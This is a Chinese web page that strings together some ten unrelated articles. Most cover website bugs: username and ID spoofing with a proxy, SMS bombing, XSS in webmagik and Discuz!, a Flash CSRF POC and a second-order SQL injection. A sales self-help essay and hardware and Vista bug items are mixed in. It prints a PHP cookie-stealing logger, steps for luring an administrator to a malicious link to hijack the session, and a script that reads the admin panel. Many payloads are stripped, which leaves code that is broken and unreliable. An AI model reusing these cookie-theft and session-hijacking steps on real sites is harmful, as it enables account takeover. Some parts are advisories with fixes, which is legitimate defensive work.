下面就是小编给大家带来的浅谈虚拟社区安全bug的发现及利用(共含10篇),希望能帮助到大家!同时,但愿您也能像本文投稿人“不知名魔仙”一样,积极向本站投稿分享好文章。
作者:王岗
本文发表在《 手册》杂志(www.nohack.cn),版权归其所有,请指明出处,
个人网站:www.itheroes.cn
现在网络上的论坛和社区有很多,论坛绝大多数使用的是一些可以免费下载代码并使用的论坛,研究这些代码的人很多,所以关于这方面的安全文章有很多,这里就不做介绍,本文着重介绍一些虚拟社区的安全Bug的发现和利用方法,因为都是些大网站自己开发的社区,为了避免造成不良影响,这里就不抓图和详细说了,只以A,B表示,请大家不要对号入座,因为我做了一些处理^_^。
下文要用到Achilles,所以先讲一下Achilles的使用方法。Achilles是一个本地的代理服务器,打开后它会占用本地5000端口做代理服务器。在ie设置代理服务器ip为127.0.0.1,端口为5000,然后在Achilles选择上Iintercept mode ON,Intercept Client Data和Ignore .jpg/gif这三项,再点左上角的三角图标(Strat Proxy),就可以跟踪Http会话状态了,如图所示(图一)
图一
大网站的社区基本都是自己开发的,因此我们是看不到代码的(就算有,对我这样不懂asp,jsp,php,asp.net等开发语言的人也没用^_^),我们只能靠大量的测试来找虚拟社区的安全Bug,我的做法一般是先注册个用户,然后看一下社区都有哪些功能,哪些有可能被破坏者利用。
A社区是由asp代码编写,功能单一,主要以论坛为主。我们先来看一下它的安全性。先注册个用户,用户名只允许由数字,字母,下划线组成,因为这个社区的管理员的用户名为admin,那我们就注册个admin,如果注册成功,那我们进入社区后,你会发现你的id为admin,因为不会显示,而且,有可能你的权限会变为管理员(我在另外两个代码为站长自己编写的小型社区测试成功过,在我所测试的大社区里不行),不过注册当然不会成功,页面代码会进行鉴别的,提示注册的用户名中有非法字符,这里我们就可以使用Achilles来帮我们达到目的了,到Achilles里看一下抓到的数据包,找到你注册的用户名:admin,修改成admin(admin也可以),然后点Achilles中的send,过一会网站会提示“成功注册”,
你可以发个帖子试一下,你的用户名会显示为admin,尽管你的实际用户名是admin,如果有破坏者把头像和昵称改成和admin一样,以admin的身份发帖子,扰乱社区秩序,蒙骗网友,我想对社区的人气肯定会有不良影响。既然我们可以提交带html语言的用户名,我们能不能利用个Bug来做点什么?可不可以把asp木马的代码做为注册名?我想应该不行,原因一是asp木马字节太多(以前看到过有一句话木马,具体没接触过,不知道在什么情况下使用),恐怕超出了用户名字段设置的长度,原因二提交数据时,各部分内容都是以“&”符号连接的,我看了一下asp木马的代码,好象都带“&”符号,所以不行。不过可以发段图片代码,社区会显示我的用户名为一张图片,聪明的读者你应该会想到如何利用这个 Bug了吧。
B社区为jsp开发,子系统很多,有论坛,日记系统,拍卖中心,交友系统等,功能很多,不过功能越强大,存在漏洞的风险就越大。这个社区以前存在id欺骗,我发现后告诉社区管理员了,过了几天答复这个漏洞修补好了,我用iecv按照以前的方法测试了一下,发现确实没问题了,这次再找找有没有Bug。注册个普通用户,发个帖子,然后运行Achilles,点“编辑”,分析一下拦截到的数据,发现鉴别身份不光有用户id号(在这个社区,每个用户不光有用户名,还有一个id号,而且唯一),还有JSESSIONID,那我们把截获的所有数据包中这个id号改成管理员的id号看一下,然后提交修改过的数据,发现编辑帖子的人不是我当前的用户了,而是管理员,那个JSESSIONID简直是形同虚设。既然可以以别人的身份编辑自己的帖子,那我想这个Bug肯定还可以在别的子系统使用,测试发现确实是这样。
总结:感谢大家听我罗嗦了这么多,这篇文章我主要想写给广大web程序开发人员,如果能让大家意识到代码编写不严谨所造成的后果,而且能够纠正大家以前认为别人看不到社区代码就万事大吉的错误思想,那我的目的也就达到了,至于如何解决上面所说的问题,我想大家都能找出解决方法的。我已经把存在的Bug告诉这些社区的管理员了。最后说一句,本文方法仅供研究,请勿用于破坏上,由本文方法造成任何损失,由使用者负责,本人概不负责。测试环境:win高级服务器版(sp4)
代号Yonah的CoreDuo处理器正式发布还不到0天,Intel的后顾之忧就已经不小:在CoreDuo中发现的bug迄今已经达到个,平均每天超过一个半,
当然,无论是对软件还是对硬件来说,出现bug都是很正常的。不单CPU,芯片组、GPU也都不能保证绝对没有疏漏。对于Intel和AMD这样的生产商来说,产品在出厂之前早就进行过严格的各种测试,绝大多数bug都能很快得到修正。
在CoreDuo中发现的这个bug中,有些可通过软件层次进行修正,如固件升级方面的,其它一些则可能会比较严重,
但根据Intel提供的勘误表,他们只计划对其中一条进行修正。也就是说,在Intel看来,其它bug都算不上什么问题。
在此之前,Intel的Pentium处理器曾出现过严重的计算精度问题,导致Intel累计损失约5亿美元。目前的Pentium架构也存在6个之多的bug,但基本不会对处理器造成很明显的影响,因此很多都没有进行修正。
CoreDuo/Solo处理器勘误表(每月升级一次)
一些软件利用网络短信的Bug给手机发送大量短消息,那么网络短信的Bug到底是如何产生的?又该如何去防范呢?
一、原理剖析
细看这些被发送的短信,内容也并不是由短信炸弹制造者来控制的,因为他们不可能架构专门的短信设备来发送。他们发送的不过是一些网站的注册验证密码的短信而已,只不过是重复发送了许多次。
那么这些注册验证密码的短信为何可以重复发送多次?因为一般的短信网络服务网站在注册时,只要输入手机号码而不加任何验证就会给输入的手机号码发送一个确认短信。那么试想一下,我们用相同的手机号码对服务器发送N次的注册请求,再对N个这样的短信网络服务网站发送注册请求,不就给该手机号码发送了N的2次方条短信了吗?
事实上,这些“短信炸弹”软件也正是这样做的,它们利用短信网络服务网站注册时无任何限制的特点而不停地向服务器发送GET请求页面,从而达到了向目标手机发送多条注册验证密码短信的目的,
二、防范措施
知道了原理,防范起来也就比较容易了。手机用户如果关闭了短消息功能固然不会收到这些“短信炸弹”,但毕竟是一个治标不治本的方法。既然“短信炸弹”源于网络短信的漏洞,那就应该想办法把这些漏洞给堵上。
对网络短信网站的服务商而言,首先可以限定IP或者时间差提交手机号码注册的次数。也就是说,用一个IP注册相同的手机号码要限定次数,或者一定的时间内相同手机号码注册的次数也是要有限制。腾讯QQ以前的注册号码方式就使用过这样的方法来防止单一用户注册大量的QQ号码。
其次还有更为简单而且也是目前这些网络短信网站普遍使用的方法,那就是注册时使用验证密码。输入手机号码的同时,还要输入网站上随机出现的密码才可以注册。如图,是网易的手机注册时进入的页面,除了输入手机号码外,还要输入网站上的随机验证密码。因为验证密码是随机出现的,并且每注册一次密码都会更改一次,所以“短信炸弹”软件向服务器发送请求页面的时候,就不可能正确包含这一随机密码参数,也就不可能达到多次发送短信的目的了。
其实在很早以前,就有网站在用这种随机验证密码的方法来防止别有用心的人搞破坏。
比较典型的是Chinaren的同学录,以前用户登录进去以后就可以直接在校友录上发表留言,但这种没有密码验证就可发帖的方式很容易让人编制软件来恶意发帖。后来Chinaren的同学录在发表留言时都要输入随机字符,这种随机出现的认证字符方式就在一定程度上防止了通过软件提交发帖请求的恶意发帖行为。
漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表,
利用形式1:
myhack58.com/web2/?u=Club_talk_list&tag=
其中myhack58.com/web2/为网站连接,Club_talk_list为用户自定义版块。
利用形式2:
myhack58.com/web2/?a=list&tag=
其中myhack58.com/web2/为网站连接,这个就是所谓的全局tag搜索。
漏洞危害:欺骗用户点击假冒连接盗取访问者的cookies甚至可能危害到访问者电脑安全,涉及帐户的相关信息可能被盗取。
漏洞发现者:clin003
已向官方报告漏洞情况。请wm使用者关注官方修补办法。
官方修补办法地址: webmagik.cn/bbs/viewthread.php?tid=638&pid=2225
CODE:
1 下载 module_list.php (2.83 KB)
并上传覆盖 /meta/module/module_list.php 后台重新生成各模块代码即可。
2 不想重新手工生成代码的,可以直接修改对应的 /umod/XXX_list.php 在页面最上方添加 $_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
Added By Easy
——————————————————————
临时解决办法:
在所有涉及到tag搜索的页面 添加一行代码.
[Copy to clipboard] [ - ]
CODE:
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
官方在下一个版本会把过滤加进去。顺便说下,在模块基本设定中,如果开启不过滤数据,用户添加的内容也可以存在此问题。
----------------------------------
补充下:
在list.php(/mod/list.php)第二十四行的位置回车加上
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
这个是全局搜索tag的地方更新模块的时候不会被更新。
——————————————————————
漏洞发现过程:
在寻找使用过的中文标签为什么会失效的答案。添加一篇文章,然后由于想把“中间带空格的标签”合起来而使用啦单引号比如:‘webmagik 跨站’,提交的时候就出现问题。一堆数据库错误信息!!
怀疑有注入漏洞,,经多次检测没有注入漏洞。
忽然想到检测下跨站的这个xss代码(上次已经检测过搜索框的iframe跨站漏洞,只是没公布)。
--------------------------------------------------
下边是介绍xss漏洞的常识
----------------------------------------------------
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为“XSS”,这是因为“CSS”一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:“Script. Injection”,他们的区别在以下两点:
1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以 入远程页面?
主流脚本包括以下几种:
HTML
JavaScript. (本文讨论)
VBScript
ActiveX
Flash
测试代码:
1,在自己服务器上建立如下文件:
Getcookie.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date(“j F, Y, g:i a”);
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.htm', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'
');
fclose($fp);
?>
Xss.js
document.write('');
2,发送信息给管理员
内容包含下边的连接:
myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
改进后的代码:
myhack58.com/web2/?a=list&tag=
成功收到cookies
3,等待管理员点击然后检查获得victim.htm内容。
4,复制从PHPSESSID= 到;的内容
启发来源:WEB漏洞挖掘技术
参考漏洞分析格式:PhpNuke管理员密码可泄露问题
link@myhack58.com
----------------------------------------------------------------------
相关链接:
XSS:wiki.matrix.org.cn/Wiki.jsp?page=XSS
跨站脚本攻击(XSS)FAQ:tech.idv2.com//08/30/xss-faq/
也谈跨站脚本攻击与防御:www.xfocus.net/articles/200607/874.html
浅析XSS(Cross Site Script)漏洞原:www.xker.com/page/e/0704/27444_3.html
PHP-Nuke个人消息存在HTML插入漏洞:www.xfocus.net/vuls/08/2970.html
--------------------------------------------------------------------
预防的办法:-----------------------------------------------
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如“<”和“>”。
可以把“<”,“>”转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括“=”。
对我们浏览网页的网友来说不要访问包含
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
upload//3/201103300326291646.bmp+onload=alert(“1111”)>
upload/2011/3/201103300326291646.bmp+onload=alert(“1111”)>
myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
upload/2011/3/201103300326291646.bmp+onload=alert('1111')>
upload/2011/3/201103300326291646.bmp+onload=alert(1111)>
myhack58.com/web2/?a=list&tag=<“
myhack58.com/web2/?a=list&tag=<'
myhack58.com/web2/?a=list&tag=<
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
以上所有的连接都检测出漏洞
漏洞利用代码:
获得cookie
myhack58.com/web2/?a=list&tag=%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E
==============================================
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为”XSS“,这是因为”CSS“一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:”Script. Injection“,他们的区别在以下两点:
1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以 入远程页面?
主流脚本包括以下几种:
HTML
JavaScript. (本文讨论)
VBScript
ActiveX
Flash
是什么原因导致一个站点存在XSS的安全漏洞?
许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或其他类型的错误时,
出错信息会被打印到一个html文件,并将该错误页面发送给访问者,
例如: 404 - yourfile.html Not Found!
我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成因,我们还是仔细看一下。
例:www.somesite.tld/cgi-bin/program.cgi?page=downloads.html该URL指向的连接是有效的,但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html,一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。
考虑一下它是如何把我们的输入写到html文件里的?
OK,现在是我们检查XSS漏洞的时候了!
注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一写javascript代码到页面里。当然方法很多www.somesite.tld/cgi-bin/program.cgi?page=
当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,”XSS_Vuln_Testing“?
这个例子只是一个XSS漏洞的简单演示,并无实际意义,但足以说明问题所在。
下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404 error页面中,结果创建了一个页面,如下:
404-
其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。
如何利用XSS来完成hacking?
如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。
事例:
假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是b00b这个人。 www.myemailserver.tld/cgi-bin/news.cgi?article=59035
把上面存在CSS漏洞的连接修改一下: www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
这会创建了一个错误页面,我们得到如下信息: Invalid Input! [article=hax0red]
当插入下面这样的javascript代码时,你的屏幕上会弹出一个包含test的消息框。
www.myemailserver.tld/cgi-bin/news.cgi?article=进行有效过滤,所以在页面发回到浏览器并执行了该脚本。
下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱,首先你必须知道b00b的email地址,
并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接,嘿嘿,当然
它的用意就是从b00b机器中cookie信息里获得自己想要的东东。
想办法让b00b访问myemailserver.tld站点发表的文章,比如说:”亲爱的b00b,看看这个美
女
如何呀?”
那么当可怜的b00b访问 www.myemailserver.tld/cgi-bin/news.cgi?article=
连接时,发生什么事情?cookie都有了,你该知道怎么办了吧!
如果在你目前不是这样的情形,你可以拷贝email服务器的登陆页面,挂到其他的系统上,
然后引导用户登陆你的恶意系统页面
这样用户信息你可以记录下来,然后再把记录的信息发送回真正的email服务器页面,
那些笨蛋并不会意识到实际发生的事情。
把javascript脚本插入WEB页面的不同方法:
拷贝自:GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.
[IE]
[IE]
&
&{[code]}; [N4]
[N4]
[N4]
[N4]
[IE]
[Mozilla]
[IE]
” nmouseover=“[code]”>
[xC0][xBC]script.>[code][xC0][xBC]/script. [UTF-8; IE, Opera]
----Copied from GOBBLES SECURITY ADVISORY #33----
该脚本首先通过 $ENV{'QUERY_STRING'}获得cookie,打印到$borrowed_info变量里,
通过open(EVIL_COOKIE_LOG, “>>evil_cookie_log”),把cookie信息保存到evil_cookie_lo
g文件。
注意:上面的javascript脚本,可能在一些浏览器或者站点上不能执行,
这仅仅是我在自己的站点上做测试用的。
如何防范XSS攻击?
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如“<”和“>”。
可以把“<”,“>”转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括“=”。
对受害者来说不要访问包含
document.write('');
xss.js
document.write('');
getcookie.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date(“j F, Y, g:i a”);
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'
');
fclose($fp);
?>
----------------------------------
测试 Web 应用程序是否存在跨站点脚本漏洞
发布日期: 05月06日
作者:Chris Weber,Casaba Security,LLC (chris@casabasec.com)
到目前为止,对于跨站点脚本攻击具有很大的威胁这一点大家并无异议。如果您很精通 XSS 并且只想看看有什么好的测试方法可供借鉴,那么请直接跳到本文的测试部分。如果您对此一无所知,请按顺序认真阅读!如果某个怀有恶意的人(攻击者)可以强迫某个不知情的用户(受害者)运行攻击者选择的客户端脚本,那么便会发生跨站点脚本攻击。“跨站点脚本”这个词应该属于用词不当的情况,因为它不仅与脚本有关,而且它甚至不一定是跨站点的。所以,它就是一个在发现这种攻击时起的一个名字,并且一直沿用至今。从现在开始,我们将使用它常见的缩写名称 “XSS”。
XSS 攻击的过程涉及以下三方:
•
攻击者
•
受害者
•
存在漏洞的网站(攻击者可以使用它对受害者采取行动)
在这三方之中,只有受害者会实际运行攻击者的代码。网站仅仅是发起攻击的一个载体,一般不会受到影响。可以用多种方式发起 XSS 攻击。例如,攻击者可通过电子邮件、IM 或其他途径向受害者发送一个经过经心构造的恶意 URL。当受害者在 Web 浏览器中打开该 URL 的时侯,网站会显示一个页面并在受害者的计算机上执行脚本。
XSS 漏洞是什么样的呢?
作为一名 Web 开发人员或测试人员,您肯定知道 Web 应用程序的技术基础是由 HTTP 和 HTML 组成的。HTTP 协议是 HTML 的传输机制,可使用代码设计 Web 页面布局和生成页面。
如果 Web 应用程序接受用户通过 HTTP 请求(如 GET 或 POST)提交的输入信息,然后使用输出 HTML 代码在某些地方显示这些信息,便可能存在 XSS 漏洞。下面是一个最简单的例子:
1. Web 请求如下所示:
GET www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title
2. 在发出请求后,服务器返回的 HTML 内容包括:
可以看到,传递给“title”查询字符串参数的用户输入可能被保存在一个字符串变量中并且由 Web 应用程序插入到
3. 现在,如果站点没有在服务器端对用户输入加以过滤(因为总是可以绕过客户端控件),那么恶意用户便可以使用许多手段对此漏洞加以滥用:
攻击者可以通过摆脱
www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title
这个请求的 HTML 输出将为:
即便是这个最简单的例子,攻击者也可以利用此连接完成数不清的事情。让我们看看会有哪些潜在的威胁,然后讨论一些更高级的测试方法。
XSS 攻击的威胁有多么严重?
由于能够在生成的 Web 页面中注入代码,能想到的威胁有多么严重,就可以有多么严重的威胁。攻击者可以使用 XSS 漏洞窃取 Cookie,劫持帐户,执行 ActiveX,执行 Flash 内容,强迫您下载软件,或者是对硬盘和数据采取操作。
只要您点击了某些 URL,这一切便有可能发生。每天之中,在阅读来自留言板或新闻组的受信任的电子邮件的时侯,您会多少次地单击其中的 URL?
网络钓鱼攻击通常利用 XSS 漏洞来装扮成合法站点。可以看到很多这样的情况,比如您的银行给你发来了一封电子邮件,向您告知对您的帐户进行了一些修改并诱使您点击某些超链接。如果仔细观察这些 URL,它们实际上可能利用了银行网站中存在的漏洞,它们的形式类似于 mybank.com/somepage?redirect=,这里利用了“redirect”参数来执行攻击。
如果您足够狡猾的话,可以将管理员定为攻击目标,您可以发送一封具有如下主题的邮件:“求救!这个网站地址总是出现错误!”在管理员打开该 URL 后,便可以执行许多恶意操作,例如窃取他(或她)的凭证。
好了,现在我们已经理解了它的危害性 -- 危害用户,危害管理员,给公司带来坏的公共形象。现在,让我们看看本文的重点 -- 测试您的网站是否存在这些问题。
由于Discuz!对flash跨域策略文件及上传图片文件处理不严导致可以绕过formhash及Referer的限制,导致csrf攻击.
author: 80vul-A
team:www.80vul.com
Discuz!的安全人员已经意识到csrf方面的漏洞了采用了formhash及判断Referer等来防止外部提交,如果看过[1]一文的朋友应该意识到我们可以通过flash来进行csrf攻击.
一 分析
首先我们看Discuz!6开始自带了crossdomain.xml文件,代码如下:
import RegExp;
var xml:XML = new XML;
xml.onData = function(s) {
tb1.text = getFirstMatch(new RegExp(“
}
System.security.loadPolicyFile(“192.168.1.102/crossdomain.xml”);
xml.load(“192.168.1.102/d.txt”);
熟悉as安全的人知道,flash已经修补了http头定义的漏洞,也就是说我们没有办法利用下面的代码:.addRequestHeader(“Referer: foo/index.php?foo”,“www.80vul.com”);
来伪造Referer,但是我们可以通过类似于SODB--01里的利用通过把flash改为gif后缀上传到目标来突破,然后我们通过html远程调用这个gif来突破.
二 利用
POC[测试Discuz!5.5 其他版本的请自己编写]如下:
flash的原文件:www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla
as代码如下:
import RegExp;
System.security.loadPolicyFile(“www.80vul.com/bbs/crossdomain.xml”);
var xml:XML = new XML();
xml.onData = function(s) {
tb1.text = getFirstMatch(new RegExp(“
}
System.security.loadPolicyFile(“www.80vul.com/bbs/crossdomain.xml”);
xml.load(“www.80vul.com/bbs/admincp.php?action=members”);
function getFirstMatch(re, s, i) {
var m = null;
if ((m = re.exec(s)) != null) {
return m[i];
}
}
远程调用的html:
三 补丁
等待官方补丁.
[删除crossdomain.xml不可以完全修补该漏洞,crossdomain.xml可以为容易文件名loadPolicyFile()调用就行,所以攻击者可以通过上传等上传改名了的crossdomain.xml]
四 参考
[1]:superhei.blogbus.com/logs/13463505.html
由于Discuz!在处理数据库的错误信息时对$GLOBALS['PHP_SELF']没有过滤,导致在让数据库出错的情况下导致xss攻击.
author: 80vul-B
team:www.80vul.com
一 分析
在文件includedb_mysql_error.inc.php里代码:
if($message) {
$errmsg = “Discuz! info: $messagenn”;
}
if(isset($GLOBALS['_DSESSION']['discuz_user'])) {
$errmsg .= “User: ”.htmlspecialchars($GLOBALS['_DSESSION']['discuz_user']).“n”;
}
$errmsg .= “Time: ”.gmdate(“Y-n-j g:ia”, $timestamp + ($GLOBALS['timeoffset'] * 3600)).“n”;
$errmsg .= “Script: ”.$GLOBALS['PHP_SELF'].“nn”;
if($sql) {
$errmsg .= “SQL: ”.htmlspecialchars($sql).“n”;
}
$errmsg .= “Error: $dberrorn”;
$errmsg .= “Errno.: $dberrno”;
$GLOBALS['PHP_SELF']确实过滤,导致在出现sql错误信息时利用$GLOBALS['PHP_SELF']进行xss攻击.二 利用
需要结合其他的让出现错误信息的漏洞.
三 补丁[fix]
过滤$GLOBALS['PHP_SELF']
微信的安全bug么?今天早上收到一条微信密码验证短信,接着我的微信就被别人登录了!
这是怎么做到的?是不是微信安全系统有个大bug?
[这是微信的安全bug么?]
由于Discuz!d的include/moderation.inc.php存在一个'二次攻击'导致数据库'注射'的bug
author: 80vul-B
team:www.80vul.com
一 分析
在文件include/moderation.inc.php里代码:
$threadlist = $loglist = array;
if($tids = implodeids($moderate)) {
$query = $db->query(“SELECT * FROM {$tablepre}threads WHERE tid IN ($tids) AND fid='$fid' AND displayorder>='0' AND digest>='0' LIMIT $tpp”);
while($thread = $db->fetch_array($query)) {
...
$threadlist[$thread['tid']] = $thread;
...
foreach($threadlist as $tid => $thread) {
...
if($type == 'redirect') {
$db->query(“INSERT INTO {$tablepre}threads (fid, readperm, iconid, author, authorid, subject, dateline, lastpost, lastposter, views, replies, displayorder, digest, closed, special, attachment)
VALUES ('$thread[fid]', '$thread[readperm]', '$thread[iconid]', '”.addslashes($thread['author']).“', '$thread[authorid]', '”.addslashes($thread['subject']).“', '$thread[dateline]', '$thread[dblastpost]', '$thread[lastposter]', '0', '0', '0', '0', '$thread[tid]', '0', '0')”);
这个比较明显,从数据库查询出的值$thread[lastposter]直接带入了insert语句中,导致了注射:)这个看上去比上面的那个用处大些,其实有很多的限制.首先$thread[lastposter]是从数据库中查询出来的值,有字数限制[不能大于15个字符];其次,这个地方需要版主权限才能操作.
二 利用
注册新用户,用户名为80vul',发表新回复,然后用拥有版主权限的账号将此帖转移,移动方式选为[移动主题并在原来的版块中保留转向],和上面的效果一样,执行时数据库报错了:)
三 补丁[fix]
等待官方补丁.
发现并利用自己的优势
一、优势的定义及内容
自身优势简单说就是个人才干,就是个人本身所具有的超出别人的表面的或者内在的素质,才干是人做事的工具,是人做事的能力和本领。才干包括良好的沟通力、敏锐的洞察力,准确的判断力,果敢的执行力,灵活的协调力,,坚定的意志力等等。
二、优势的重要性——成功重在发挥你的优势
成功心理学创始人之一、盖洛普咨询有限公司名誉董事长唐纳德·克利夫顿说过:在成功心理学看来,判断一个人是不是成功,最主要的是看他是否最大限度地发挥了自己的优势。
每个人都希望并可能获得成功,然而成功的路却往往不同,成功者常常不在于他们能力的多样化,而在于他们找到了自己的优势,并充分发挥了自己的优势。著名笑星赵本山的成功之路,就是一个最好的例证。赵本上还是一个农民的时候,有人说他重活干不成,轻活不愿干,光会耍“嘴皮子”。然而,赵本山正是利用了自己“嘴皮子”强的优势,经过不断努力,改革创新,使“东北二人转”这一古老的东北民间表演形式,走出了东北,享誉全国,丰富和发展了中华民族的戏剧文化宝库。他的成功之路告诉我们,只有善于发现自己的优势,培养自己的优势,强化自己的优势,发挥自己的优势,才能到达成功的彼岸。
又有一个很经典的故事。其大意是小兔子被送进了动物学校,它最喜欢跑步课,并且总是得第一:最不喜欢的则是游泳课,一上游泳课它就非常痛苦。但是兔爸爸和兔妈妈要求小兔子什么都学,不允许它有所放弃。
小兔子只好每天垂头丧气地到学校上学,老师问它是不是在为游泳太差而烦恼,小兔子点点头,盼望得到老师的帮助。老师说,其实这个问题很好解决,你的跑步是强项但是游泳是弱项,这样好了,你以后不用上跑步课了,可以专心练习游泳……
这个故事告诉我们什么?老师说的对吗?(
中国有句古话:只要功夫深,铁棒磨成针。讲的是只要坚持不懈,就一定能成功。但是看了上面这个寓言的人可能会意识到,小兔子根本不是学游泳的料,即使再刻苦它也不会成为游泳能手;相反,如果训练得法,它也许会成为跑步冠军。
上面故事中老师的观点是典型的传统观点,传统上我们强调弥补缺点,纠正不足并以此来定义“进步”,
而事实上,当人们把精力和时间用于弥补缺点时,就无暇顾及增强和发挥优势了;更何况任何人的欠缺都比才干多得,而且大部分的欠缺是无法弥补的。
三、如何发现自己的销售优势
现实生活中你该如何发现自己的优势?
当你发现自己在做许多事情时需要学习,需要不断地去修正和演练。而在做另外一些事情时,却几乎是自发的,不用想就本能地去完成这些事情。这就是你的优势(表面的优势)。
内在的还需自己去从日常工作生活的细节中去挖掘。
1、 自信、积极乐观
2、 不要被别人或自己所束缚
3、 大胆、放开些
4、 用心、注意细节
发现自己的销售优势
1、热情、有活力,具有良好的亲和力
2、沉稳、细心,让客户觉得可靠
3、反应快,表达能力强,擅于抓住客户的心理
4、专业经验丰富,让客户信服
5、沟通能力强,能主动把握局面
6、敢于承认自己的不足,并能积极采取解决的办法
7、面对困难不退缩,具有坚定的意志力
四、如何充分运用自己的优势
1、有意识 2、有计划3、优势组合(合作)
切记:不能以自负的心态来夸大自己的优势,这样不但不能提高强化优势,不能获得成功,只会让自己得意忘形,最终面对失败。
除了华丽的外表,Vista也的确在各种功能上有了不小的飞跃,不过智者千虑必有一疏,微软却在最基本的删除、复制、移动文件问题上犯下了低级错误,导致系统经常算不出剩余时间,
事实上,早在Windows 2000就有此类错误,但很罕见,比如在删除、复制、移动文件的最后时刻系统却显示还需要几十亿分钟。在Windows Vista里,这一传统被“发扬光大”,Vista仿佛成了一个小学生,即使是删除几个快捷方式,也会半天都算不清楚还需要多长时间才能完成。
Reghardware的一位读者抱怨说:“我亲眼见过这个bug。相信我,就像是在只有256MB内存的机器上通过64kbps的猫发送文件一样。更麻烦的是,你根本无法取消操作。”
微软论坛上的“hac5x3”也是非常愤怒:“我真是无法相信,我升级了电脑,安装了Vista,却发现它甚至都不能利索地搞定移动和删除操作,
微软一定是在开玩笑!我每天都在使用的最起码的功能却像是一列慢车。”
微软曾经为此提供过一个hotfix补丁,但并未能平息众怒,因为hotfix需要微软的“恩准”才能下载,而且比安装patch补丁麻烦得多。
微软的一位发言人表示,微软会考虑就此发布patch补丁。
关 键 字:Windows安全
★ Windows 8.1 Update1新版修复黑屏Bug
★ 发现父爱
